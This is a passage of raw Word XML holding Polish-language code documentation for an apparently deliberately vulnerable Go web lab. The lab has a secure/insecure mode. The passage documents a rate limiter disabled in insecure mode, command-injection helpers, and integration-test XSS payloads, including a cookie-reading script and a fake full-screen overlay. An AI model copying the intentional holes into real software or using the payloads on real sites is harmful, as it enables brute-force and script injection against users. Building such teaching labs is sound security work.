      <w:bookmarkEnd w:id="163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internal/service/service.go:506</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CheckRateLimit returns true (allowed) when the username has not exceeded the failure threshold within the lockout window. Always returns true in insecure mode so brute-force is trivially possible.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CheckRateLimit returns true (allowed) when the username has not exceeded the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failure threshold within the lockout window. Always returns true in insecure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mode so brute-force is trivially possible.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CheckRateLimit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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2120" w:name="lst120"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 120. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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64" w:name="sec164"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.45. *Service.RecordLoginFailure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164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internal/service/service.go:526</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RecordLoginFailure increments the failure counter for the username. No-op in insecure mode.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color w:val="64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// RecordLoginFailure increments the failure counter for the username.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// No-op in insecure mode.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w: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Service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RecordLoginFailure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username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21" w:name="lst121"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 121. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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username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65" w:name="sec165"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. internal/views</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/views/cmd_injection_helpers.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/views/layout_helpers.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="166" w:name="sec166"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.1. Funkcje i metody</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="167" w:name="sec167"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.2. cmdInjectionCodeDiff</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167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internal/views/cmd_injection_helpers.go:3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cmdInjectionCodeDiff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122" w:name="lst122"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 122. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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68" w:name="sec168"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.3. cmdInjectionCurlExamples</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168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internal/views/cmd_injection_helpers.go:14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cmdInjectionCurlExamples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123" w:name="lst123"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 123. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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69" w:name="sec169"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.4. layoutBodyClass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169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internal/views/layout_helpers.go:3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layoutBodyClass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124" w:name="lst124"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 124. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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securityEnabled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70" w:name="sec170"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.5. commentPlaceholder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170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internal/views/layout_helpers.go:11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commentPlaceholder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125" w:name="lst125"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 125. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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securityEnabled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71" w:name="sec171"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.6. authHeroTip</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171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internal/views/layout_helpers.go:18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authHeroTip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mode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126" w:name="lst126"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 126. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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mode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72" w:name="sec172"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10. root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>main.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>main_integration_test.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="173" w:name="sec173"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.1. Typy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="174" w:name="sec174"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.2. postDTO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct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main_integration_test.go:24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> typ postDTO przechowuje dane używane przez pakiet root _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>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Title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PostContent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pole danych struktury.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Published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pole danych struktury.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="175" w:name="sec175"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.3. Stałe i zmienne</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="176" w:name="sec176"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.4. _</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> var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main_integration_test.go:1214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io.Discard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> io.Discard is referenced indirectly; keep import alive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="177" w:name="sec177"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.5. uploadsDir</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177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main.go:19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wartość/początek:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"./uploads"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root _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="178" w:name="sec178"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.6. xssImgPayload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178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main_integration_test.go:991</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wartość/początek:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="alert(1)"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>`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root _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="179" w:name="sec179"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.7. xssOverlayPayload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179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main_integration_test.go:992</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wartość/początek:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="document.body.insertAdjacentHTML('afterbegin','&lt;div style="position:fixed;inset:0;z-index:9999;background:#111827;color:white;padding:40px"&gt;&lt;h1&gt;Sessi...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root _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="180" w:name="sec180"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.8. xssScriptPayload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> const</w:t>
      </w:r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main_integration_test.go:990</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wartość/początek:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('XSS-' + document.cookie)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wartość pomocnicza używana przez pakiet root _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="181" w:name="sec181"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.9. Funkcje i metody</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="182" w:name="sec182"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.10. buildRouter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182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main.go:23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buildRouter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dbConn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initialSecurityEnabled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Engine</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2127" w:name="lst127"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 127. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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dbConn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*sql.DB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initialSecurityEnabled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*gin.Engine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83" w:name="sec183"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.11. registerHealthRoutes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183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main.go:40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registerHealthRoutes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Engine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28" w:name="lst128"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 128. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Engine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84" w:name="sec184"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.12. registerAPIRoutes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184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main.go:46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registerAPIRoutes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Engine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29" w:name="lst129"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 129. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Engine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h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*handlers.Handler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85" w:name="sec185"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.13. registerUIRoutes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185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main.go:66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registerUIRoutes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Engine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mode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security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ModeStore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30" w:name="lst130"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 130. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Engine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h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*handlers.Handler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mode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*security.ModeStore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86" w:name="sec186"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.14. registerLabRoutes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186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main.go:104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registerLabRoutes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Engine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h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handlers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Handler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31" w:name="lst131"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 131. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Engine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h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*handlers.Handler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87" w:name="sec187"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.15. main</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187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main.go:138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main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32" w:name="lst132"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 132. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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t>brak parametrów wejściowych.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88" w:name="sec188"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.16. setupIntegrationTestApp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188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main_integration_test.go:31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setupIntegrationTestApp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Engine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33" w:name="lst133"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 133. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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*gin.Engine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*sql.DB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89" w:name="sec189"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.17. setupIntegrationTestAppWithSecurity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189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main_integration_test.go:36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setupIntegrationTestAppWithSecurity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securityEnabled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bool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Engine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sql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DB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34" w:name="lst134"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 134. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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securityEnabled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bool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*gin.Engine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*sql.DB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - wartość zwracana przez funkcję/metodę.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90" w:name="sec190"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.18. doRequest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190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main_integration_test.go:53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doRequest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Engine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method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path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httptest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ResponseRecorder</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2135" w:name="lst135"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 135. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Engine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method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path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body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*httptest.ResponseRecorder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91" w:name="sec191"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.19. doFormRequest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191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main_integration_test.go:65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doFormRequest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Engine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method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path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httptest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ResponseRecorder</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2136" w:name="lst136"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 136. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Engine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method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path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body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*httptest.ResponseRecorder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92" w:name="sec192"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.20. doFormRequestWithCookie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192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main_integration_test.go:77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doFormRequestWithCookie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Engine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method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path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cookie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httptest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ResponseRecorder</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2137" w:name="lst137"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 137. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Engine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method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path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body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cookie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*httptest.ResponseRecorder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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="193" w:name="sec193"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.21. doRequestWithCookie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193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main_integration_test.go:92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doRequestWithCookie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Engine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method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path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cookie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httptest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ResponseRecorder</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2138" w:name="lst138"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 138. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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router</w:t>
      </w:r>
